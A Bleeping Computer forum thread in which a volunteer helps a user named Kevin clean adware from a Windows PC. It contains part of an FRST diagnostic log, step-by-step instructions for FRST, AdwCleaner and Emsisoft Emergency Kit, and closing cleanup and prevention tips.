(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\localhost -> localhost
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-10-30 18:24 - 2016-02-23 23:19 - 00000826 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 211.29.132.12 - 198.142.0.51
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: Apple Mobile Device Service => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: GfExperienceService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: Intel® Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: Intel® Security Assist => 3
MSCONFIG\Services: isaHelperSvc => 2
MSCONFIG\Services: jhi_service => 2
MSCONFIG\Services: LavasoftTcpService => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamNetworkSvc => 3
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: SearchProtectionService => 2
MSCONFIG\Services: Stereo Service => 2
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\StartupApproved\Run: => "Web Companion"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{933C174D-60AA-4642-A5BE-989279E1238B}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3ECB97AD-B8A7-4BB2-A3E8-4F1AF44358EB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FC5DAEE3-C818-47DE-95BC-7DF8D6E23D06}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{742EEC9F-5CF9-47CD-80E6-F08D7192D0E1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{8ACCD632-5B9C-4F6A-B7D7-FC998820F0F8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{AB0A6656-F880-4669-837D-07A240976BAD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B59FF7DF-3F51-43C9-98EF-D851409D8303}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{57E43343-7D7C-40A7-8A81-50ED85A760DD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D23F4212-AAED-45C5-B24C-370E70B44D52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BEBEB11E-57DA-42EB-8678-342F8AEA8EBE}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{068ACC00-C710-43A5-86B4-A906CE27D757}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D975E4B7-5E0F-4475-BBA2-3F24F1BD0AD9}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9E827FEF-51F7-4BD8-94BE-865FA25182BF}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{635BF03A-B7C9-4733-9CBD-A6091EF99F79}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{BA35DE3B-2B8C-46C7-9C7B-C2D48A6523ED}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92C8EF79-17B1-473D-A119-62CE3DADF2BB}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F370A64C-0368-4397-9EB9-BA1DE6B3AE41}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{C6B42A5B-829F-4388-96A8-56881880A07C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{649116C5-D440-4C6E-A0B8-BE0D425D04C7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{A3839923-09A6-4D1A-8B9A-4E2D12E35E89}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{07AD62CB-1C31-4200-8C9D-D850DC1E05AB}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{333F229D-BD98-4645-85E8-2C4D738B71D7}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{619879CD-6CCA-4A3D-9439-20B31CA0A13F}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [TCP Query User{20E07F8A-7AFD-4AC4-AB47-C99F674B3F63}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [UDP Query User{D9654C13-7844-45C1-9835-9CC6348842D5}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [TCP Query User{F0AA2A6B-103E-434D-8ED1-100A28C552E6}C:\users\kevin\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kevin\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0D3166E4-25A8-4900-8947-6F87AF2D6E18}C:\users\kevin\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kevin\appdata\roaming\spotify\spotify.exe
FirewallRules: [{C33BA485-7EED-44A0-B44D-9028E5D0FA47}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{43198E66-D334-4319-9BA7-0E4FCA8FAC08}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E4CAAD9-F909-4E7B-BFAE-18CD26ACCE51}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3904D310-F1DB-4420-BF8C-5E4C6F88D9DA}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{19B88D35-EE35-4B71-BD3E-C26F9729806F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A747C069-4A27-498C-95F2-4DA42B8731B3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{8C42E2F6-06BF-41F0-B0A7-11FC162E2101}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4759B541-F9A4-4142-A999-63B1BD80C1A7}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{F5009673-1F63-4F8E-B4F2-1B6290EE7C26}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{803B1226-0C60-48B9-B8F4-68ECBC568458}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
 
==================== Restore Points =========================
 
08-03-2016 19:20:52 Scheduled Checkpoint
09-03-2016 14:42:32 Malwarebytes Anti-Rootkit Restore Point
09-03-2016 14:45:08 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (03/09/2016 03:00:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mbar.exe version 1.9.3.1001 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 2b1c
 
Start Time: 01d179b6928b487b
 
Termination Time: 6333
 
Application Path: C:\Users\kevin\Desktop\mbar\mbar.exe
 
Report Id: 797455f0-e5ab-11e5-b58e-bc5ff40bb7ea
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (03/09/2016 02:56:08 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-USOP2KE)
Description: Package Microsoft.WindowsStore_2016.27.2.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
 
Error: (03/09/2016 02:45:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (03/09/2016 02:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
 
System errors:
=============
Error: (03/09/2016 03:06:03 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}NT AUTHORITYNETWORK SERVICES-1-5-20LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:00:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_38a85 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (03/09/2016 03:00:46 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (03/09/2016 02:45:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Display Driver Service service terminated unexpectedly.  It has done this 1 time(s).
 
 
CodeIntegrity:
===================================
  Date: 2016-03-09 15:06:20.223
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:06:20.214
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:05:26.092
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:05:26.083
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:02:01.852
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-09 14:55:56.035
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 14:55:56.025
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-03 16:48:16.670
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-02 17:19:17.848
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-02 12:03:17.545
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 30%
Total physical RAM: 8081.48 MB
Available physical RAM: 5623.64 MB
Total Virtual: 9361.48 MB
Available Virtual: 6780.46 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:232.88 GB) (Free:103.25 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.05 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive g: (FILES) (Fixed) (Total:297.99 GB) (Free:175.54 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 3970C7B2)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=298 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Attached Files


Edited by Kevin07, 09 March 2016 - 05:37 AM.


BC AdBot (Login to Remove)

 


#2 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,512 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:02:13 AM

Posted 09 March 2016 - 02:47 PM

Hello
  • Welcome to Bleeping Computer.
  • My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  • In the upper right hand corner of the topic you will see a button called Follow This Topic.I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.
  • Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  • I will be analyzing your log. I will get back to you with instructions.
1.
Download attached fixlist.txt file and save it to the Desktop. NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST/FRST64 and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.




2.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database, please wait a bit.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.
How is the machine running now?

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#3 Kevin07

Kevin07
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:09:13 AM

Posted 10 March 2016 - 01:41 AM

Thanks for your help, It seems like the problem has been solved. I have attached the files requested.

Attached Files



#4 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,512 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:02:13 AM

Posted 10 March 2016 - 07:51 AM

Glad to hear things are better. Lets run one more scanner for any leftovers.

img=]http://i.imgur.com/ZN3USrZ.png] Emsisoft Emergency Kit
  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled). A screen like this will appear:
    dQVDkTW.png
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon qwL1Upn.png will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures. A screen like this should appear:
    yEgPemv.png
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
    RUeRoi4.png
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
    P7FSALs.png
  • Please Copy and Paste the contents of the scan log in your next reply.

Edited by fireman4it, 10 March 2016 - 07:53 AM.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#5 Kevin07

Kevin07
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:09:13 AM

Posted 10 March 2016 - 11:54 PM

Hi,

 

Log is attached.

Attached Files



#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,512 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:02:13 AM

Posted 11 March 2016 - 06:00 PM

It Appears That Your Pc Is Now Clean!

***



Clean up:

***



Right-click  AdwCleaner.exe and select Run As Administrator.
  • Click on the Uninstall button.
  • A window will open, press the Confirm button.
  • AdwCleaner will uninstall now.


***



Clean up with delfix:
  • please download delfix to your desktop.
  • Close all other programms and start delfix.
  • Please check all the boxes and run the tool.
  • delfix will now delete all found traces of our removal process

***



Delete the log files our tools created; they are located at your desktop or at the
"c:\users\{.......}\Downloads" folder.
Highlight them, and press the del or delete key on the keyboard.
You can browse to the location of the file or folder using either My Computer or Windows Explorer.

***



Here are some Preventive tips to reduce the potential for spyware infection in the future

:step1: Browse more secure


:step2: Make sure you keep your Windows OS current.
  • Windows XP users can visit Windows update regularly to download and install any critical updates and service packs.
  • Windows Vista / 7 / 8 users can update via
    Start menu > All Programs > Windows Update > Check for Updates (in left hand task pane).

:step3: Avoid P2P
  • If you think you're using a "safe" P2P program, only the program is safe, not the data.
  • You will share files from unsafe sources, and these may be infected.
  • Some bad guys use P2P filesharing as an important chanel to spread their wares.

:step4: Use only one anti-virus software and keep it up-to-date.

:step5: Firewall
Without a firewall your computer is succeptible to being hacked and taken over. I am very serious about this and see it happen almost every day with my clients. Simply using a Firewall in its default configuration can lower your risk greatly.

:step6: Backup regularly
You never know when your PC will become unstable or become so infected that you can't recover it.

:step7: Use Strong passwords!

:step8: Email attachments
Do not open any unknown email attachments, which you received without asking for it!


Extra note:
Keep your Browser, Java, pdf Reader and Adobe Flash Up to Date.
And you could install Malwarebytes Anti-Exploit to run alongside your traditional anti-virus or anti-malware products.

Make sure your programs are up to date - because older versions may contain Security Leaks.


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#7 Kevin07

Kevin07
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:09:13 AM

Posted 12 March 2016 - 11:32 PM

thank you for your time!



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,512 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:02:13 AM

Posted 14 March 2016 - 07:53 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users